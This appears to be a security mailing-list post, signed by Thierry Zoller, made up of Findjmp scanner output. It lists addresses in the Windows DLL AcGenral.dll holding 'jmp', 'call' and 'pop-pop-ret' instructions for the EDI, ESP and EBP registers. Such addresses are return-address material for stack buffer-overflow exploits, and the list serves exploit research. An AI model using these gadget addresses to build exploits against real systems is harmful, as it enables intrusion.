Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with
the ESI register
Found 412 usable addresses

Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EDI
register
0x6FD98937      jmp EDI
0x6FD9C171      pop EDI - pop - retbis
0x6FD9F898      pop EDI - pop - retbis
0x6FD9F94A      pop EDI - pop - retbis
0x6FD9FC3C      pop EDI - pop - retbis
0x6FD9FDCA      call EDI
0x6FD9FDEA      call EDI
0x6FDA0C82      call EDI
0x6FDA0CED      call EDI
0x6FDA105B      pop EDI - pop - retbis
0x6FDA167F      call EDI
0x6FDA168E      call EDI
0x6FDA1793      pop EDI - pop - retbis
0x6FDA1848      pop EDI - pop - retbis
0x6FDA196C      pop EDI - pop - retbis
0x6FDA19CB      call EDI
0x6FDA19E1      call EDI
0x6FDA1A77      pop EDI - pop - retbis
0x6FDA1AED      call EDI
0x6FDA1AFC      call EDI
0x6FDA1C01      pop EDI - pop - retbis
0x6FDA1C85      call EDI
0x6FDA2685      call EDI
0x6FDA26A5      call EDI
0x6FDA3BAC      pop EDI - pop - retbis
0x6FDA3DB8      pop EDI - pop - retbis
0x6FDA3EC6      pop EDI - pop - retbis
0x6FDA4580      pop EDI - pop - retbis
0x6FDA45C6      pop EDI - pop - retbis
0x6FDA516D      pop EDI - pop - retbis
0x6FDA5372      pop EDI - pop - retbis
0x6FDA53F2      pop EDI - pop - retbis
0x6FDA5D78      call EDI
0x6FDA5DA9      call EDI
0x6FDA6041      pop EDI - pop - retbis
0x6FDA62CE      call EDI
0x6FDA6B3D      pop EDI - pop - retbis
0x6FDA6BF6      pop EDI - pop - retbis
0x6FDA6CAF      pop EDI - pop - retbis
0x6FDA6D68      pop EDI - pop - retbis
0x6FDA7DDB      pop EDI - pop - retbis
0x6FDA83C5      call EDI
0x6FDA83D4      call EDI
0x6FDA847F      call EDI
0x6FDA848E      call EDI
0x6FDA8D87      pop EDI - pop - retbis
0x6FDAA0AE      pop EDI - pop - retbis
0x6FDAB0CC      pop EDI - pop - retbis
0x6FDAC3FB      pop EDI - pop - retbis
0x6FDAC5AD      pop EDI - pop - ret
0x6FDAE05E      call EDI
0x6FDAE06D      call EDI
0x6FDAE17C      pop EDI - pop - retbis
0x6FDAE834      call EDI
0x6FDAE870      call EDI
0x6FDAEA71      pop EDI - pop - retbis
0x6FDAF509      pop EDI - pop - ret
0x6FDAF54A      pop EDI - pop - ret
0x6FDAF96B      pop EDI - pop - retbis
0x6FDB0524      pop EDI - pop - retbis
0x6FDB0636      call EDI
0x6FDB0A56      pop EDI - pop - retbis
0x6FDB1061      pop EDI - pop - retbis
0x6FDB1467      call EDI
0x6FDB1486      call EDI
0x6FDB19C7      call EDI
0x6FDB1A02      call EDI
0x6FDB1A32      call EDI
0x6FDB1D66      call EDI
0x6FDB1D78      call EDI
0x6FDB2336      call EDI
0x6FDB2351      call EDI
0x6FDB2866      pop EDI - pop - ret
0x6FDB29E6      pop EDI - pop - ret
0x6FDB3147      pop EDI - pop - ret
0x6FDB32C1      call EDI
0x6FDB32E8      call EDI
0x6FDB3367      call EDI
0x6FDB3391      call EDI
0x6FDB3451      call EDI
0x6FDB3477      call EDI
0x6FDB3AE8      call EDI
0x6FDB3B5C      call EDI
0x6FDB3DD6      pop EDI - pop - retbis
0x6FDB4152      pop EDI - pop - ret
0x6FDB4E6E      pop EDI - pop - ret
0x6FDB535A      call EDI
0x6FDB5423      call EDI
0x6FDB5452      call EDI
0x6FDB73DB      pop EDI - pop - ret
0x6FDB73E2      pop EDI - pop - ret
0x6FDB73E9      pop EDI - pop - ret
0x6FDB77B2      pop EDI - pop - ret
0x6FDB7EF1      pop EDI - pop - ret
0x6FDB860F      pop EDI - pop - ret
0x6FDB8B02      call EDI
0x6FDB8B0D      call EDI
0x6FDB8FE5      pop EDI - pop - ret
0x6FDBE4AB      call EDI
0x6FDBE4C8      call EDI
Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with
the EDI register
Found 100 usable addresses

Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the ESP
register
0x6FD9D83D      call ESP
Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with
the ESP register
Found 1 usable addresses

Findjmp, Eeye, I2S-LaB
Findjmp2, Hat-Squad
Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with the EBP
register
0x6FD9840B      call EBP
0x6FDBFCEF      call EBP
0x6FE77B85      jmp EBP
0x6FF5271F      jmp EBP
Finished Scanning C:\WINDOWS\AppPatch\AcGenral.dll for code useable with
the EBP register
Found 4 usable addresses




--
http://secdev.zoller.lu
Thierry Zoller



